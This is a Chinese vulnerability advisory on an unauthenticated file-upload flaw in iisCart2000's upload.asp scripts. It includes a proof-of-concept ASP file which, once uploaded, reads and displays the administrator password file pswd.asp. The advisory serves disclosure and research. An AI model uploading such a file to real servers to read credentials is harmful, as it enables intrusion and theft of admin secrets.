iisCart2000任意文件上传漏洞
发布日期:2003-05-31
更新日期:2003-06-05
受影响系统:iisCart iisCart2000
描述:
BUGTRAQ ID:
7765
iisCart2000是一款基于ASP的电子商务解决方案,支持使用浏览器进行文件上传。
iisCart2000包含的upload.asp脚本存在漏洞,使远程攻击者可以上传任意文件到有此漏洞的服务器中。
iiCART2k包含高级和基本两种上传类型,高级类型的漏洞存在于/admin/upload.asp脚本中,基本类型的问题存在于/upload.asp脚本中,这两个脚本都没有检查权限,并没有任何保护。任何攻击者可以上传恶意文件到服务器中。iiCART2k还提供/admin/upload.htm和/upload.htm脚本使攻击更加容易。
<*来源:Bosen (
mobile@bosen.net)
链接:
http://marc.theaimsgroup.com/?l=bugtraq&m=105448678108571&w=2
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
Bosen (
mobile@bosen.net)提供了如下测试方法:
// 1ndonesian Security Team
//
http://bosen.net/releases/
//
<% @ Language = JScript %>
<%
function WinPath(absPath) {this.absolutePath = absPath;}
function getAbsPath() {return this.absolutePath;}
WinPath.prototype.getAbsolutePath = getAbsPath;
function fileRead(file) {
var FSO = new ActiveXObject("Scripting.FileSystemObject"), strOut = ""
var tmp = file, f, g = FSO.GetFile(tmp);
f = FSO.OpenTextFile(tmp, 1, false);
strOut = "<PRE STYLE=\"font-size:9pt;\">";
strOut+= Server.HTMLEncode(f.ReadAll());
strOut+= "</PRE>";
f.Close();
return(strOut);
}
var a = new WinPath(Server.Mappath("/"));
var curDir = a.getAbsolutePath();
// You can change these
var admin = curDir + "\\advanced\\admin\\pswd.asp";
with (Response) {
Write("<b>ServerRoot : "+curDir+"<br></b>");
Write("<b>Admin Info : "+admin+"<br><br></b>");
Write(fileRead(admin));
}
%>
上传此ASP文件,可以显示当前配置文件内容。
建议:
厂商补丁:
iisCart
-------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.iiscart.com/浏览次数:4020
严重程度:0(网友投票)
